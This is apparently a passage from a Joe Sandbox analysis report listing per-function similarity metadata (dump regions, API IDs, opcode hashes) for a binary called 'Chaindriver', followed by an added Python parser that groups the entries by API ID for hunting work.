                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                     • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 569c634512f381af965fa2c66bca64ac59e19598741f6191cb67c2c779fbbc01
                                                    • Instruction ID: 66b4f5e5c692d2a92369be1aaad079ae9989ec4664456e977a181d93c95682f1
                                                    • Opcode Fuzzy Hash: 569c634512f381af965fa2c66bca64ac59e19598741f6191cb67c2c779fbbc01
                                                    • Instruction Fuzzy Hash: 77016956E1868581FA24A724EC8526EB361FBC5B90FD05235D79D07BA5DE3CE1408A24
                                                    APIs
                                                      • Part of subcall function 00007FF720B61584: GetModuleHandleW.KERNEL32(?,?,?,00007FF720B614F3,?,?,?,00007FF720B618AA), ref: 00007FF720B615AB
                                                    • DloadProtectSection.DELAYIMP ref: 00007FF720B61549
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                     • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: DloadHandleModuleProtectSection
                                                    • String ID:
                                                    • API String ID: 2883838935-0
                                                    • Opcode ID: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                    • Instruction ID: 6082c2d947318056abb3906f431243c4c960c93e779089d6dd82963f6f96aaeb
                                                    • Opcode Fuzzy Hash: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                    • Instruction Fuzzy Hash: 5C117865D0854B82FF75BB15AC56378D260EF64348F990439C90F867A1DF3CB6998E30
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
                                                     • Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
                                                     • Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                    • Instruction ID: 53df706ad34b87add0d0df29da0c6c21a5f89443ec7cf8bdd4882d0572d3af49
                                                    • Opcode Fuzzy Hash: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                    • Instruction Fuzzy Hash: 34F04959B1A20751FE7576A69D1A3BDD291DF99B80F8C4439CA0F863C5EE1CF8808A30
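The function blocks above are the Joe Sandbox IDA plugin's per-function metadata for the dropped 64-bit binary in process 7 (image base 00007FF720B30000): which dump region the code sits in, which CRT or delay-load helper it was matched to, and the opcode and instruction IDs used for similarity lookups. The following parser is an added example for this page, not Joe Sandbox code and not part of the report; it turns entries of this shape into records so the Opcode IDs can be pivoted across reports and the dump regions compared. The layout of the .sdmp name (which field is the base address, which is the PAGE_* protection, which is the region type) is an assumption inferred from the values visible here (0x20 on the code page at base+0x1000, 0x04 on the data page, 0x01000000 on every region), not a documented format. The sample input is constructed from two of the entries above, trimmed to one Associated region.

```python
"""Parse Joe Sandbox function-block entries of the kind listed above.

Added example for this page, not Joe Sandbox code. The .sdmp name layout
(field order and meaning) is an assumption inferred from the values in this
report, not a documented format."""
import re
from collections import defaultdict

# winnt.h memory-protection / region-type constants.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: proc.stage.dumpid.base.protect.state.type.seq.sdmp
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
                     r"([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.I)
KV_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")

def decode_sdmp(name):
    """Return base address, protection and region type of a dump-file name.
    The protect field reads 0x20 on the code page and 0x04 on the data page in
    this report, which is why it is taken to be a PAGE_* value (assumption)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    protect, rtype = int(m.group(5), 16), int(m.group(7), 16)
    return {"process_index": int(m.group(1), 16), "base": int(m.group(4), 16),
            "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
            "type": MEM_TYPE.get(rtype, hex(rtype)), "executable": bool(protect & 0xF0)}

def parse_entries(text):
    """One dict per function block; a block starts at a bare 'APIs' line.
    Lines before the first 'APIs' (the tail of a block cut off by the excerpt)
    are skipped rather than guessed at."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"api_calls": [], "associated": []}
            entries.append(cur)
            section = "apis"
        elif cur is None or not line:
            continue
        elif line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
        elif section == "apis":
            cur["api_calls"].append(line.lstrip("• "))   # resolved calls / subcall notes
        elif (m := KV_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":   # "<name>, Offset: <pe base>, based on PE: true"
                name, _, rest = value.partition(",")
                cur["source"] = decode_sdmp(name)
                off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest)
                cur["pe_base"] = int(off.group(1), 16) if off else None
            elif key == "Associated":
                cur["associated"].append(decode_sdmp(value))
            else:
                cur[key.lower().replace(" ", "_")] = value   # api_id, opcode_id, ...
    return entries

def group_by_api(entries):
    """API ID -> opcode IDs: the pivot for finding the same routine in other reports."""
    groups = defaultdict(list)
    for e in entries:
        groups[e.get("api_id", "")].append(e.get("opcode_id"))
    return dict(groups)

# Constructed sample: two blocks copied from the listing above, trimmed to one
# Associated region each; the first line is the tail of a block cut off above.
SAMPLE = """\
• Instruction Fuzzy Hash: ECE0E561B1458682DF199B59CC955AEE391FF88B40BC48036E50B83B14DE2CF2498F20
APIs
Memory Dump Source
• Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
• Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: 0775a86a686ea590aaf7c9edd055dabde09601dbd76f09eba2acf58d909f3722
• Instruction ID: 7d0f38ca261041f90fdc6fc304ac8d0642be2ae8c971f2728dfd9def0bfc764e
• Opcode Fuzzy Hash: 0775a86a686ea590aaf7c9edd055dabde09601dbd76f09eba2acf58d909f3722
• Instruction Fuzzy Hash: ABD1A862B0868155EB78AB259D842BEE7A1FB55F84F940035DB5E47BA1CF38F4608B30
APIs
  • Part of subcall function 00007FF720B61584: GetModuleHandleW.KERNEL32(?,?,?,00007FF720B614F3,?,?,?,00007FF720B618AA), ref: 00007FF720B615AB
• DloadProtectSection.DELAYIMP ref: 00007FF720B61549
Memory Dump Source
• Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
Similarity
• API ID: DloadHandleModuleProtectSection
• Opcode ID: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e["api_id"], e["source"]["protect"],
              [hex(a["base"]) for a in e["associated"]], e["api_calls"])
```

Every entry in this listing points at the same executable region (base+0x1000, PAGE_EXECUTE_READ, MEM_IMAGE), so the useful pivot is the Opcode ID per API ID rather than the region; the matched API IDs (`_invalid_parameter_noinfo*`, `std::bad_alloc`, `DloadProtectSection`) are all CRT and delay-load runtime helpers, which is why an analyst would exclude them when hunting for the sample's own code.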